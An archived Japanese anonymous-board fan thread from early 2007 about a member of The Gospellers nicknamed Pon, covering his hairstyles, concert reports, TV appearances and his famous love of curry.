162 :NO MUSIC NO NAME:2007/01/18(木) 18:54:08 ID:ZONESYcE
パパーと叫べるほど育っとるんかい

163 :NO MUSIC NO NAME:2007/01/18(木) 19:01:14 ID:4vPOuZru
それは広末の子でしょ

164 :NO MUSIC NO NAME:2007/01/18(木) 19:02:39 ID:U407nwAW
目撃話より噂話でスレが進んでる・・・
漏れの見つけてきたのはダメですか、そうですかorz

165 :NO MUSIC NO NAME:2007/01/18(木) 19:51:26 ID:DdzVLVpf
》164
別にダメではない。
でも一時期、加緒里が他のメンバーに色目つけてたという話を聞いた。
確かキターマだった気がする。
というか残り3人が独身組か

166 :NO MUSIC NO NAME:2007/01/18(木) 19:52:10 ID:7ZKe28Jk
ここに本人くるわけじゃないし、
ポンの子がどうのなんて話題は終着しないからいいよ・・・

>>150
久々にマターリな話d
爽やかだったろうなぁ(´ー`)

167 :NO MUSIC NO NAME:2007/01/18(木) 21:10:00 ID:m+LObO/b
目の前にババアがいたら
ダレだって普通に譲るだろ

168 :NO MUSIC NO NAME:2007/01/19(金) 01:18:48 ID:bjHtMlhe
ID:DdzVLVpf、sage覚えたのは褒めるけど
空気ぐらい読んでね☆

169 :NO MUSIC NO NAME:2007/01/19(金) 02:05:24 ID:FxywdZSE
じゃあ今から空気読むか。。

でも、「ここは会話する場所じゃないんだから」っていう2ちゃんねらーがいたり「空気読め」っていったりどっちなんだよって感じ☆

170 :NO MUSIC NO NAME:2007/01/19(金) 03:24:23 ID:VY19BKqn
それも分からないとはな
空気読めないはずだ

171 :NO MUSIC NO NAME:2007/01/19(金) 04:32:36 ID:XqSRssr9
アカペラの頃のスーパーサイヤ人みたいな髪型
好きだったりするw
パチパチは前髪下ろしてるの見て買おうと決めた。

172 :NO MUSIC NO NAME:2007/01/19(金) 05:49:58 ID:CGWpHQP5
今月号のパチパチの?
あれはすごくいいね。
サイヤ人には戻ってほしくないかも。

173 :NO MUSIC NO NAME:2007/01/19(金) 16:48:15 ID:QE4WgbJ5
好きだよサイヤ人髪型♪
ソロの時は萎えた

174 :NO MUSIC NO NAME:2007/01/19(金) 23:07:32 ID:CGWpHQP5
ソロのぽんは超カッコ良かったね。

175 :NO MUSIC NO NAME:2007/01/20(土) 01:57:00 ID:5/MCXosj
ソロの時のDVDとかって出てるの?

176 :NO MUSIC NO NAME:2007/01/20(土) 02:38:41 ID:F6rl/pkS
>171
アカペラの頃は結構イイと思ってた
後から見たら
オマイやり過ぎw
ってなぐらいスーパーサイヤ人でビビったw

今はキューピーみたいだよなorz


177 :NO MUSIC NO NAME:2007/01/20(土) 10:26:12 ID:gKikK+Vq
キューピーの黒ぽん好きだよ。

178 :NO MUSIC NO NAME:2007/01/20(土) 11:05:03 ID:edVVJ73V
やだやだキューピー(>_<)

179 :NO MUSIC NO NAME:2007/01/20(土) 11:28:33 ID:E83q9y+b
そこに禿しく評判の悪い誓いヘアヲタの私が通るわけですが

180 :NO MUSIC NO NAME:2007/01/20(土) 15:59:07 ID:Tyi3Dx8r
>>179
(・∀・)人(・∀・)ナカーマ
大仏様みたいなくるくるパーマともじゃもじゃモミーが素敵だったw
告白の髭にも萌えたけど、やっぱりPはイタリア系がいい。

181 :NO MUSIC NO NAME:2007/01/20(土) 16:16:28 ID:E83q9y+b
イタリア系…分かる!
あの頃のぽん、イタリアかぶれだったよね
あの小さい伊達男が可愛くて仕方なかったよ
いや、かっこもよかったけど

182 :NO MUSIC NO NAME:2007/01/20(土) 19:50:31 ID:OjmStRr3
漏れはFIVEKEYSのポンが一番好きだ。惚れた
しかも美食家気取りなのがまた( ・∀・)イイ!!

今更ながらペラッツDVD見たが、去年の夏からやっぱり痩せたな
ツアー参加する前に見てよかった、これで二倍痩せて見えるよw

183 :NO MUSIC NO NAME:2007/01/20(土) 20:46:08 ID:I7Y5XrN7
キューピーの黒ぽんで
たらこ黒ぽんを連想した。

184 :NO MUSIC NO NAME:2007/01/20(土) 21:03:36 ID:5/MCXosj
>>182ぽんってペラッツのDVDに出てるの!?

185 :NO MUSIC NO NAME:2007/01/20(土) 23:57:20 ID:F6rl/pkS
>183
タラの白子ふいたw
 
誓いはアー写はイヤだけど、PV好きだなー
丸いって評判良くないけど
陰影でカコヨク見えるw

でも一番は、漏れもFIVE KEYSだな。
シャツの袖が長いのも萌え

186 :NO MUSIC NO NAME:2007/01/21(日) 09:01:02 ID:f34/WbKs
>>184
最後に皆でめ組のひとを歌うときにちらちら出てるだけ
けど心底楽しそうなポンの表情が見られるので余裕があるなら見るべし
でもヲタでもないオカンに「小さいからすぐわかるねぇ」と言われてたw

187 :NO MUSIC NO NAME:2007/01/21(日) 10:45:58 ID:DF/wGMA/
身長だけはどうしようもないもんねぇ・・・。
ポンがいい体のうちに何度もライブに行きたい。

188 :NO MUSIC NO NAME:2007/01/21(日) 11:44:41 ID:MvtmiWko
>>186ありがと
楽しんでる姿見たい…

189 :NO MUSIC NO NAME:2007/01/21(日) 20:59:32 ID:O9VkOB3M
漏れはライトンのチョイ髭パイナポーぽんがツボった

190 :NO MUSIC NO NAME:2007/01/22(月) 00:37:12 ID:BYYLS+DV
一筋…のPVでカレー作ってるぽんはホントに楽しそうだな

191 :NO MUSIC NO NAME:2007/01/23(火) 01:06:51 ID:agkXnfLO
丸いけどな…

カレー絡みの画像にハズレがない気がする(・∀・)イイネ

192 :NO MUSIC NO NAME:2007/01/23(火) 19:20:43 ID:VCyufJ3f
「一筋〜」の
♪タマネギもってフリフリ♪のとこが
カワユカッタ(^∀^)/

193 :NO MUSIC NO NAME:2007/01/23(火) 19:31:09 ID:ivwXD13G
CDでーたの写真も毎回けっこういいできだしね
今回のはなんかエロかこいいよポン

194 :NO MUSIC NO NAME :2007/01/23(火) 20:38:13 ID:hruP2yRV
この人、まだプードル飼ってる?

195 :NO MUSIC NO NAME:2007/01/24(水) 01:50:59 ID:p764NTkL
飼ってる。
あの黒いやつを。

196 :NO MUSIC NO NAME:2007/01/24(水) 22:07:20 ID:4yzdusza
来月最初のエスシーに今度デビューする後輩が来るね。
提供曲聞けるね。

今オクに出てるなにわじゃない方の写真の髪型好きだな。

197 :NO MUSIC NO NAME:2007/01/27(土) 01:58:16 ID:X85WnGlV
過疎〜

毎回カレー絡みの写真にしちまえばいいのにw
街角のジャケ写で
顎割れてるとか散々言われて悲しかった。
自分も散々言ってるのになwww

198 :NO MUSIC NO NAME:2007/01/27(土) 16:07:50 ID:+56asKWa
今日のSCは誰だ?はいはいおじさん?
kとのセッション期待してたのになー

昨日テレビに出てるイルマリ見て
昔ポンとイルマリちょっと似てるって思ってたw

199 :NO MUSIC NO NAME:2007/01/27(土) 16:35:04 ID:ctwbeaHQ
↑確かに似てたかも…
永遠にとかのPV似てる…

200 :NO MUSIC NO NAME:2007/01/27(土) 17:13:49 ID:vxEaARJM
似てる似てるwイルマリ

201 :NO MUSIC NO NAME:2007/01/27(土) 17:24:45 ID:ctwbeaHQ
ほんとに似てるwww

202 :NO MUSIC NO NAME:2007/01/27(土) 20:13:17 ID:zNplWDaD
イルマリに似てるってのはそれは前から言われてたじゃん。

203 :NO MUSIC NO NAME:2007/01/27(土) 21:27:47 ID:yAkoEnLZ
本スレから三年くらい遅れた地域だと考えれば問題なし

204 :NO MUSIC NO NAME:2007/01/27(土) 21:39:16 ID:zNplWDaD
>>203
ワロタw そして納得したw

205 :NO MUSIC NO NAME:2007/01/27(土) 22:06:05 ID:+56asKWa
すまんな、最近のヲタなもんで

206 :NO MUSIC NO NAME:2007/01/27(土) 22:10:15 ID:K+JkVAWr
新参は
   そのアピールが
          うざがられる

207 :NO MUSIC NO NAME:2007/01/28(日) 17:19:21 ID:Fxv3unZ8
今日、高校受験だった。
昨日はゴスが地元でライブしてた。
来年はいきたいな。

208 :NO MUSIC NO NAME:2007/01/28(日) 18:43:51 ID:ITpTC/Ln
↑受験おつかれ(^ω^)

209 :NO MUSIC NO NAME:2007/01/29(月) 16:39:30 ID:Uyfr/Fc/
受かるといいね。
そしてその内容なら別のところに書いてね。

210 :NO MUSIC NO NAME:2007/01/29(月) 22:30:11 ID:BfP/d07p
嗚呼・・・ようつべで見たゴスペラーズ出演のクイズ番組の、質問されたときの
ポンの顔が忘れられないよ。ちょっと下向いて、横に顔傾けて、最高。

211 :NO MUSIC NO NAME:2007/01/29(月) 22:58:23 ID:XaHZsWLo
あー、ソレ見えよ。
もう一回貼ってくれよ(お願いスマス)

212 :NO MUSIC NO NAME:2007/01/30(火) 17:37:11 ID:suDTLzgu
ぽんって結婚指輪してる!?

213 :NO MUSIC NO NAME:2007/01/30(火) 19:17:19 ID:4/Q/EXYO
なぜ書き込めない?

214 :NO MUSIC NO NAME:2007/01/30(火) 19:21:38 ID:4/Q/EXYO
普通に見えたけどなぁ。

215 :NO MUSIC NO NAME:2007/01/30(火) 20:52:57 ID:QjyZDi+9
今見えるアレのことか?
だったら見たみた。悪かったよ。
昔のタイムショックかなにかの話だと思った。

216 :NO MUSIC NO NAME:2007/01/30(火) 20:59:44 ID:4/Q/EXYO
え?和田とか松浦とか出てるやつだよね?
ポンかわいかったよ〜〜。
松本に質問されて「ん?」って感じでちょっと向いて首かしげてるヤツ。

217 :NO MUSIC NO NAME:2007/01/30(火) 21:47:19 ID:oOS/LMJL
>>216
機種依存文字はやめれ。
ネットやってれば常識だろ。

タイムショックは目立ってなかったw
一箇所萌えどころがあったような気もするけど。

218 :NO MUSIC NO NAME:2007/01/30(火) 21:52:57 ID:QjyZDi+9
昔の奴みたいなあ。
たいむしょっくとかさー。


219 :NO MUSIC NO NAME:2007/01/31(水) 11:29:44 ID:+f4OQ2mi
モバピクなんで2つ連続ポンなんだよー
ポンのはまだかってwktkも出来ない。


220 :NO MUSIC NO NAME:2007/02/01(木) 00:25:32 ID:6dbOUaFZ
近所のツタヤが潰れてからぺたぺた歩きが買えない。
ぽん、見たいよ〜。

221 :NO MUSIC NO NAME:2007/02/01(木) 00:34:16 ID:BjODiORB
>>217
例のあの人だから諦めるしかないよw

222 :NO MUSIC NO NAME:2007/02/01(木) 01:18:16 ID:Yi1TdfsC
セルゲイポンレポ楽しみしてるんだが、
ここの住人は行けないヤシが多いのかorz

223 :NO MUSIC NO NAME:2007/02/01(木) 11:25:36 ID:9tKXO4zz
セルゲイ行ってきたよ〜とにかく狂詩曲のぽんはヤバス…エロカッコイイ(^ω^)

224 :NO MUSIC NO NAME:2007/02/01(木) 11:45:45 ID:p65TKWaK
本家に話が出てるばあちゃん、テラウラヤマシス!
ちなみにその時のポンはどの辺にいるんだ?

漏れはまた行けてないがレポガンガルよ。

逝ったヤシもどのライブのでもいいからレポщ(゚Д゚щ) カモーン!

225 :NO MUSIC NO NAME:2007/02/01(木) 20:01:35 ID:+UD+eNqP
>>224
らぷそでぃの時ポンはステージに向かってセンターより
やや左サイドにいるよ。
私はセンターやや右寄りから眺めてたよ。

226 :NO MUSIC NO NAME:2007/02/01(木) 21:43:54 ID:NHeq8ZT3
漏れはラプソデんときポンポジ目の前の最前列で思わずのけぞっちまったよ
ちゃんと見てやればよかったよ
でもあんな近くではもう拝めないだろうからまぶたにやきつけてきたよ

227 :NO MUSIC NO NAME:2007/02/01(木) 23:57:52 ID:p65TKWaK
>>225
トン!
漏れ右端の方なんだよな…orz

しかし姫路いいな。
テツの職務質問も面白いし、
ポンもよかったみたいだし。


228 :NO MUSIC NO NAME:2007/02/02(金) 13:55:49 ID:7jofGW8q
>226
裏山スイw
夢のそとも裏山だったな
 
ポン腰まわし過ぎじゃね?
あまりの回しっぷりにふいたww
どんな心境の変化なんだ?

229 :NO MUSIC NO NAME:2007/02/02(金) 16:59:47 ID:JuWPZC3b
ちょっと痩せて身が軽くなったんじゃないかw

230 :NO MUSIC NO NAME:2007/02/02(金) 18:34:27 ID:sNiQC/1C
腰フリポン。
セルゲイ最後まで続くか?

231 :NO MUSIC NO NAME:2007/02/02(金) 21:15:58 ID:lB6je7vJ
ツアー終盤にはカレーの食いすぎで
腹が波打つダンスが見られますw

232 :NO MUSIC NO NAME:2007/02/02(金) 22:27:48 ID:+sd9GCQT
ぽんはどんだけカレー食うんだ…w

233 :NO MUSIC NO NAME:2007/02/02(金) 23:45:00 ID:7NwUTC3m
ξ ・∀・) 1年のうち350日はカレーですよ

234 :NO MUSIC NO NAME:2007/02/03(土) 00:15:56 ID:meb6L3D7
巣へお帰り。
せめて150食だろう
1週間に約3食におさえてる…と信じたいw

235 :NO MUSIC NO NAME:2007/02/03(土) 02:19:36 ID:LpGlZSEW
元カレー屋
ただのOLとなった今でも優に週に5食はカレーです。
(朝はさすがにw 昼と夜で)
ポンなら週に7食は食ってるよ。


236 :NO MUSIC NO NAME:2007/02/03(土) 03:35:51 ID:EZxhaHF2
刑事がSCに来る!
ピアノを弾いたってことは生歌アリ?


237 :NO MUSIC NO NAME:2007/02/03(土) 15:44:54 ID:4eyDbDwD
そういやここでもぽんちゃんは禁止なのか?
棲み家の本家ですら最近は歓迎されないよね(´・ω・`)ショボン

238 :NO MUSIC NO NAME:2007/02/03(土) 23:24:26 ID:u/7fbHrz
漏れはたまに現れるくらいいいと思うんだけどねー
AAは他スレ逝けが最近の流れだからね。

>>236
ひさしぶりでwktk

239 :NO MUSIC NO NAME:2007/02/03(土) 23:46:27 ID:h1/pu/xd
過去ログ倉庫にひっそりコウノトリぽんがいるよなw
あれかわいくて漏れのお気に入りw

240 :NO MUSIC NO NAME:2007/02/03(土) 23:59:57 ID:2H3g8WJ8
コウノトリぽん・・・w

241 :NO MUSIC NO NAME:2007/02/04(日) 01:17:41 ID:2UFNofdC
カレーの美味しいおうちにしてね、ってあれ?

アレは子供が親に虐待されて殺された事件がおきると
事件スレに貼られるAAなんだ。
どっちが先か分からないけど
もいらにはカワイソスなAAという認識があるなあ。

242 :NO MUSIC NO NAME:2007/02/06(火) 00:20:52 ID:BvfZg7h0
そんなポマイがカワイソス

243 :NO MUSIC NO NAME:2007/02/06(火) 20:14:35 ID:WTXFi8DP
ポンタン、マターリ板でタラバが散々に言われてるお。
亭主として言い返すことないの?

244 :NO MUSIC NO NAME:2007/02/06(火) 20:37:58 ID:E4cTROZS

ξ ・∀・)<カレーオイチケレバソレデイイノ


245 :NO MUSIC NO NAME:2007/02/06(火) 21:22:45 ID:NcUMiaIW
>>243
そのスレ見たいな。

246 :NO MUSIC NO NAME:2007/02/06(火) 22:54:24 ID:E4cTROZS

ξ ・∀・)<245タンはIE使うといいよ。

247 :NO MUSIC NO NAME:2007/02/06(火) 23:31:37 ID:pe0qCYry
噂板のネタは止めようぜ
自分含め不愉快に思う人だっているんだし



そしてポンタンは巣にお帰りw

248 :NO MUSIC NO NAME:2007/02/07(水) 00:29:49 ID:VzTa2ggg
ξ ・∀・)<ポンタンはもともとここ出身だよ


249 :NO MUSIC NO NAME:2007/02/07(水) 12:03:46 ID:jwvCTJOO
ミニポンタン パパポンが探してるから低音家におかえり。

250 :NO MUSIC NO NAME:2007/02/07(水) 21:58:22 ID:T9FYIPzb
水野ってそんなに有名なモデルだっけ?
テレビとか出てたの?

251 :NO MUSIC NO NAME:2007/02/08(木) 02:24:21 ID:fxW+Am0U
ぽんちゃんは本家出身だっての
今じゃ実家の敷居はまたげないみたいだがな(つд`)
あの頃の本家は楽しかったな
あ、そういうネタも止めた方がいいか

252 :NO MUSIC NO NAME:2007/02/08(木) 14:16:02 ID:5NwXfWqk
話題もないしいいんじゃまいか?
ログ読みあさったつもりなのに、ぽんちゃん見たおぼえないやw
本家ログじゃなかったったりしてorz
なぜ、ぽんちゃんにコレξがついてんだ?
教えてチャンでスマソ
 
念のため言っておくが、ぽんちゃんはこなくていいよ。

253 :NO MUSIC NO NAME:2007/02/08(木) 17:55:06 ID:1FQgkrdp
色々察しろよ、深山。

254 :NO MUSIC NO NAME:2007/02/08(木) 20:38:36 ID:meG02Sqs
ξはもみあげだよ。
グザイって読むんだよ。
例 ウンコはξ

255 :NO MUSIC NO NAME:2007/02/08(木) 21:53:26 ID:79cK4eg5
それこそ過去ログ見ればわかるのに

256 :NO MUSIC NO NAME:2007/02/08(木) 23:51:41 ID:5NwXfWqk
一気に人が増えたなw
やはり本家ログじゃなかったか。
常駐の方ありがとうでした。
逝ってきまつ

257 :NO MUSIC NO NAME:2007/02/09(金) 01:04:54 ID:AnaCLhuj
本家だっつってんだろ
マジ消えろ

258 :NO MUSIC NO NAME:2007/02/10(土) 20:19:14 ID:nr1Dtv5R
今日のSCは生歌アリだよ。
期待通りだ。

259 :NO MUSIC NO NAME:2007/02/10(土) 23:19:40 ID:1QEwkU/g
やっぱホクよかPの方が歌馬岩〜

260 :NO MUSIC NO NAME:2007/02/11(日) 20:47:01 ID:Lf6r6jDP
明日ポンの歌声聴ける〜。


261 :NO MUSIC NO NAME:2007/02/12(月) 10:02:36 ID:qpPsgiQB
>>260 詳細教えて〜

262 :NO MUSIC NO NAME:2007/02/12(月) 21:55:38 ID:88kT53WO
>>260
帰ってきたらレポヨロ
待ってるぞ

263 :260:2007/02/13(火) 00:15:07 ID:kRoTtWm4
少し前に帰宅。
ポンの喉の調子は良かったよ。
1月末の姫路から今日の山梨まで10日ほどオフ?
その間(7と10日)に自宅でカレーパーチー
それぞれ25人くらいづつ呼んだそうだ。

ゴスのメンバーみんなで谷村新司の真似したり
爆笑したよ。

今日はとにかくクルクル回ってた、ポン。
ターンがうまくなったように思えるのは、オタの欲目?

ラプソディではあいかわらずシャツほぼ全開。
全然太ってなかった。
いい感じだ。

レポ苦手でごめん。

264 :NO MUSIC NO NAME:2007/02/13(火) 02:18:11 ID:MhNw9OM7
>>263
d!


265 :NO MUSIC NO NAME:2007/02/13(火) 11:39:36 ID:i3HVE96W
ポン調子良くなってきたみたいなので
このまま最後まで頑張って欲しい
3月のライブでもシャツ全開!の
素敵な体を拝みたい。(^0^)/


266 :NO MUSIC NO NAME:2007/02/13(火) 11:43:59 ID:aWKkFViu
>>263ありがと〜

267 :NO MUSIC NO NAME:2007/02/13(火) 19:48:12 ID:mEUvCVrE
>>260
レポ、トンクス。
ターンは期待してないが、
体をキープしてるとは感動。あと数日で拝めると思うとドチドチw
カレーパーチーしたから調子良かったってことは…ないかw

>>265
ゴミついてるぞ。
初心者か空気読みたくないのかどっちだろうなぁ。

268 :NO MUSIC NO NAME:2007/02/13(火) 21:23:58 ID:PwTiA0wU
25人も入れる居間があるポン宅って・・
大テータクなのか?
漏れん家なんて10人は立ってか、外で
カレー食べるはめになるな。

269 :NO MUSIC NO NAME:2007/02/13(火) 21:30:47 ID:sPX/lVKk
40畳くらいのリビングがあるんじゃないのか?
ちょっとしたマンソンなら珍しくない。


270 :NO MUSIC NO NAME:2007/02/13(火) 21:46:14 ID:aWKkFViu
今日のはなまるゲストに関根勤さんが…一枚の写真にパーチーの時のカレーを作っているポンの姿が。関根さんはポンのカレーに対する情熱の素晴らしさを語っていたそうな。
友達から聞いた話なのであやふやでスミマセン…あぁ見たかった(@Д@;)

271 :NO MUSIC NO NAME:2007/02/13(火) 22:55:19 ID:M/TIch7N
>>263
レポ乙
山梨楽しかったみたいだね
ポン宅のカレーパーチーにこっそり潜入してみたいぞw
漏れも数日後にはレポ出来るように頑張るよ

今日のはなまる見た人裏山…

272 :NO MUSIC NO NAME:2007/02/14(水) 14:48:51 ID:A1fptlhC
熱中時間って番組に出るらしいけど見たことないなー
どんな内容なんだろう。見たことある人いる?

273 :NO MUSIC NO NAME :2007/02/14(水) 16:03:34 ID:4rB4vk5N
>>272
昨年3/5にBS2でカレー作ってたが
また同じ番組出るの?今度は何?キョウリュウ?

274 :NO MUSIC NO NAME:2007/02/14(水) 19:44:48 ID:JB8UfPYw
去年出たのと勘違いじゃない?
もう1回出てくれれば嬉しいけどないっしょ。

275 :NO MUSIC NO NAME:2007/02/15(木) 00:06:06 ID:quMSXA57
一応公式にのってたんだけど違うのかなー?

276 :NO MUSIC NO NAME:2007/02/15(木) 00:08:13 ID:quMSXA57
今公式見直したら去年のだった!
お騒がせしてすみません!

277 :NO MUSIC NO NAME:2007/02/15(木) 01:55:39 ID:k+7IAZog
あー紛らわしいよね。<情報
以前、藻場に「昔の情報消せ!」って抗議メール送ったこと
あったけれど見事にスルーされたっけな。

278 :NO MUSIC NO NAME:2007/02/15(木) 15:17:04 ID:aooNMCsb
人手が足りんのかな?藻場。




279 :NO MUSIC NO NAME:2007/02/15(木) 16:51:03 ID:PQipIThL
CDでーた見て思うんだが、ポンってカジュアルのほうが似合ってない?

280 :NO MUSIC NO NAME:2007/02/15(木) 19:32:46 ID:QoFdwAVe
衣装のスーツは似合うと思うけど
私服はカジュアルの方がいいかもね。
駅で見かけたときも白シャツとジーンズとか
ポロシャツとチノパンとかだったが
超かっこ良かったよ。

281 :NO MUSIC NO NAME:2007/02/15(木) 19:37:45 ID:hLWSl7Pk
↑駅で見かけたとか…羨ましい(・∀・)

282 :NO MUSIC NO NAME:2007/02/15(木) 19:44:24 ID:C4FbiEiT
CDでーた、もう出てるんだね
本屋に行かなくては

それより、オマイラ!
今度の藻場のリアルレポはポンだぞ
漏れ高知に行くよーwktk


283 :NO MUSIC NO NAME:2007/02/15(木) 20:27:20 ID:hLWSl7Pk
>>282高知レポよろしく

284 :NO MUSIC NO NAME:2007/02/16(金) 00:41:02 ID:Hf5uWZbe
Pメインの動画楽しみ!
藻場のカメラ担当、カコヨク映してくれ!ナムナム

285 :NO MUSIC NO NAME:2007/02/16(金) 00:54:31 ID:Ummy0WP/
>>284
カレーを食すポンが延々と映し出される動画だったりしてなw



藻場の事だからやりそうな気がする((((;゚Д゚)))ガクガクブルブル

286 :NO MUSIC NO NAME:2007/02/16(金) 10:55:23 ID:YHCt1Jer
それはPオタの自分でもイヤだなw人がカレー延々と食ってるところ見たくないよorz

287 :NO MUSIC NO NAME:2007/02/16(金) 20:28:10 ID:BuxnmssC
うまさを熱く語りながら食うポン。
ちょっと見てみたい・・・w

288 :NO MUSIC NO NAME:2007/02/16(金) 20:38:59 ID:Qoh7VRXv
高知にそんな旨いカレー屋あったっけな…
地元高知だけど全然知らない。

289 :NO MUSIC NO NAME:2007/02/16(金) 22:58:41 ID:QJokR4Q3
しかし、ポンの紹介してるカレーって
すげーボリュームありそ。皿もでかッ。

ポンが体型崩す予感・・・

290 :NO MUSIC NO NAME:2007/02/16(金) 23:55:50 ID:Hf5uWZbe
量の少ないカレーは少ない気がす
たいがい腹十二分目w

291 :NO MUSIC NO NAME:2007/02/16(金) 23:59:11 ID:BuxnmssC
CDデータ買ってきた!ポン、カッコヨス。
泳ぐの続いてるんだね。
千秋楽までキープ出来たらぽんカレー2出版のあかつきには5冊は買うぞw


292 :NO MUSIC NO NAME:2007/02/17(土) 13:58:12 ID:BCJ17R/D
ポンの上半身半裸(全裸はキモイ)ショットと
顔面ドアップがあれば
ぽんカレー2出版のあかつきには5冊買うぞw
すべすべお肌と、割れた腹筋を見たい。
今の体型キープの上での話し。

293 :NO MUSIC NO NAME:2007/02/17(土) 18:44:04 ID:jJ9nKX60
カレーを食べて筋肉ムキムキになろう!

294 :NO MUSIC NO NAME:2007/02/18(日) 20:15:13 ID:955c0cFF
カレーの旅の友人の結婚パーティーって刑事だよね。
さすが部長。
会長レシピのカレーを出すのかw

295 :NO MUSIC NO NAME:2007/02/19(月) 00:01:33 ID:Y1oI513a
>>292
上半身半裸ってのは・・・裸ジャケットか?
全裸キモイってひどいw

296 :NO MUSIC NO NAME:2007/02/19(月) 00:04:04 ID:x5hzvwT9
>>292
じゃあ下半身半裸はどうなのかと

297 :NO MUSIC NO NAME:2007/02/19(月) 10:31:07 ID:pmWp4Kj+
ぽんのリアルレポ楽しみだお(^ω^)

298 :NO MUSIC NO NAME:2007/02/19(月) 14:35:00 ID:ZMxxeL9/
リアルレポ始まったね。
テンション上がってきたー
まだ早いけどもう会場に行こうかなw

299 :NO MUSIC NO NAME:2007/02/19(月) 15:50:23 ID:y83XLyx3
余寒的中

300 :NO MUSIC NO NAME:2007/02/19(月) 15:55:27 ID:9nNkoffO
悪寒的中でワロタww

301 :NO MUSIC NO NAME:2007/02/19(月) 16:03:08 ID:MyzLbwQu
カレーネタはもういいよ…orz

302 :NO MUSIC NO NAME:2007/02/19(月) 16:10:30 ID:xulUurOB
ポンも藻場も期待を裏切らないなww

303 :NO MUSIC NO NAME:2007/02/19(月) 16:59:34 ID:pmWp4Kj+
グッツを売るバイト生になりたい…(・∀・)!!

304 :NO MUSIC NO NAME:2007/02/20(火) 16:20:28 ID:r+q4MSM4
藻場のポンの本人書き込み保存した。
しかし、動画でカレーネタはちと・・・・。
ポンの宣伝よりリーダーの雄たけび?の方がインパクト強すぎて・・・。
どうせならグッズ売り場でバイトさんに説明してるのにしてもらいたかった。



305 :NO MUSIC NO NAME:2007/02/20(火) 18:48:41 ID:3aJxV9pZ
>>304どこに書き込みしてあるのか詳しく教えてください(*´Д`*)保存したい〜

306 :NO MUSIC NO NAME:2007/02/20(火) 19:12:27 ID:fJG4m8jX
>>304じゃないが…
リアルゴスボにあるぞ

307 :NO MUSIC NO NAME:2007/02/20(火) 19:27:42 ID:3aJxV9pZ
ホントだ(^O^)ありがとうです!!

308 :NO MUSIC NO NAME:2007/02/20(火) 20:13:59 ID:LiIyN3RM
動画ネタ、思わず画面に向かって
突っ込み入れたよw
ホントにカレー食うのか?
それを写すのか?と

カレーってそんなに
飽きないものなんダナァ・・
と妙に感心した。

309 :NO MUSIC NO NAME:2007/02/22(木) 23:05:13 ID:LUAr8WR6
藻場レポ動画は予感的中でワロスw
食ってるとこでもいいんだけど、
もっとポンの声が聞きたかった。

太い腕に萌えwww

310 :NO MUSIC NO NAME:2007/02/23(金) 16:28:20 ID:Fa5MxBm4
今更で申し訳ないΣ(∀‐;)結局紅白は再放送してないですよね!?

311 :NO MUSIC NO NAME:2007/02/23(金) 21:17:22 ID:NrVygLvf
しないねーw
「アレ」があるからできないんだねー

312 :NO MUSIC NO NAME:2007/02/23(金) 22:11:47 ID:Fa5MxBm4
↑ありがと
あぁ〜ぽん見たかったのになぁ……

52 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)